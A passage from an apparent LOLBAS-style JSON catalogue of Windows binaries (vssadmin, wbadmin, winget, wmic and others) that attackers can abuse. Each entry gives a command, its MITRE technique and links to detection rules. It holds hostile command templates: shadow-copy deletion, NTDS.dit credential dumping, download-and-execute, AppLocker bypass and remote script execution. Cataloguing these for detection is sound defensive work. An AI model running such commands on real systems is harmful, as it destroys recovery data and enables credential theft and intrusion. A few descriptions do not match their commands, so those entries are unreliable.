Evasion"],"nativeCategory":["Tamper"],"command":"vssadmin delete shadows /all /quiet","description":"Delete all volume shadow copies on the host without prompting","usecase":"Destroy shadow copies to prevent file and system recovery, a technique commonly used by ransomware","mitre":["T1490"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\vssadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"}],"references":["https://attack.mitre.org/techniques/T1490/","https://github.com/Neo23x0/Raccine","https://lolbas-project.github.io/lolbas/Binaries/Vssadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wab-exe:0","toolId":"lolbas:wab-exe","toolName":"Wab.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wab.exe","description":"Change HKLM\\Software\\Microsoft\\WAB\\DLLPath and execute DLL of choice","usecase":"Execute dll file. Bypass defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Mail\\wab.exe","C:\\Program Files (x86)\\Windows Mail\\wab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml"},{"type":"IOC","value":"WAB.exe should normally never be used"}],"references":["https://twitter.com/Hexacorn/status/991447379864932352","http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Wab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wbadmin-exe:0","toolId":"lolbas:wbadmin-exe","toolName":"wbadmin.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\\Windows\\NTDS\\NTDS.dit,C:\\Windows\\System32\\config\\SYSTEM -quiet","description":"Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)","usecase":"Snapshoting of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml"},{"type":"IOC","value":"wbadmin.exe command lines containing \"NTDS\" or \"NTDS.dit\""}],"references":["https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960","https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wbadmin-exe:1","toolId":"lolbas:wbadmin-exe","toolName":"wbadmin.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\\Windows\\NTDS\\NTDS.dit,C:\\Windows\\System32\\config\\SYSTEM -notRestoreAcl -quiet","description":"Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.","usecase":"Dumping of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml"},{"type":"IOC","value":"wbadmin.exe command lines containing \"NTDS\" or \"NTDS.dit\""}],"references":["https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960","https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wbemtest-exe:0","toolId":"lolbas:wbemtest-exe","toolName":"wbemtest.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wbemtest.exe","description":"Execute arbitary commands through WMI through a GUI managment interface for Web Based Enterprise Management testing (WBEM). Uses WMI to Create and instance of a Win32_Process WMI class with a commandline argument of the target command to spawn. Spawns a GUI so it requires interactive access. For a demo, see link to blog in resources.","usecase":"Execute arbitrary commands through WMI classes","mitre":["T1047"],"privilege":"user","fullPath":["c:\\windows\\system32\\wbem\\wbemtest.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"wbemtest.exe binary spawned"}],"references":["https://saulpanders.github.io/2025/01/20/lolbas-wbemtest.html","https://lolbas-project.github.io/lolbas/Binaries/wbemtest/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winget-exe:0","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winget.exe install --manifest {PATH:.yml}","description":"Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`","usecase":"Download and execute an arbitrary file from the internet","mitre":["T1105"],"privilege":"admin","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winget-exe:1","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"winget.exe install --accept-package-agreements -s msstore {name or ID}","description":"Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use \"Sysinternals Suite\" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.","usecase":"Download and install software from Microsoft Store, even if Microsoft Store App is blocked","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winget-exe:2","toolId":"lolbas:winget-exe","toolName":"winget.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"winget.exe install --accept-package-agreements -s msstore {name or ID}","description":"Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine, and even if AppLocker is active on the machine. For example, use \"Sysinternals Suite\" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.","usecase":"Download and install software from Microsoft Store, even if Microsoft Store App is blocked, and AppLocker is activated on the machine","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"winget.exe spawned with local manifest file"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"}],"references":["https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html","https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended","https://www.youtube.com/watch?v=zuL7x4Wltto","https://lolbas-project.github.io/lolbas/Binaries/winget/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wlrmdr-exe:0","toolId":"lolbas:wlrmdr-exe","toolName":"Wlrmdr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}","description":"Execute executable with wlrmdr.exe as parent process","usecase":"Use wlrmdr as a proxy binary to evade defensive countermeasures","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\wlrmdr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml"},{"type":"IOC","value":"wlrmdr.exe spawning any new processes"}],"references":["https://twitter.com/0gtweet/status/1493963591745220608","https://twitter.com/Oddvarmoe/status/927437787242090496","https://twitter.com/falsneg/status/1461625526640992260","https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw","https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wmic-exe:0","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"wmic.exe process call create \"{PATH_ABSOLUTE}:program.exe\"","description":"Execute a .EXE file stored as an Alternate Data Stream (ADS)","usecase":"Execute binary file hidden in Alternate data streams to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wmic-exe:1","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process call create \"{CMD}\"","description":"Execute calc from wmic","usecase":"Execute binary from wmic to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wmic-exe:2","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe /node:\"192.168.0.1\" process call create \"{CMD}\"","description":"Execute evil.exe on the remote system.","usecase":"Execute binary on a remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wmic-exe:3","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process get brief /format:\"{REMOTEURL:.xsl}\"","description":"Create a volume shadow copy of NTDS.dit that can be copied.","usecase":"Execute binary on remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wmic-exe:4","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process get brief /format:\"{PATH_SMB:.xsl}\"","description":"Executes JScript or VBScript embedded in the target remote XSL stylsheet.","usecase":"Execute script from remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wmic-exe:5","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"wmic.exe datafile where \"Name='C:\\\\windows\\\\system32\\\\calc.exe'\" call Copy \"C:\\\\users\\\\public\\\\calc.exe\"","description":"Copy file from source to destination.","usecase":"Copy 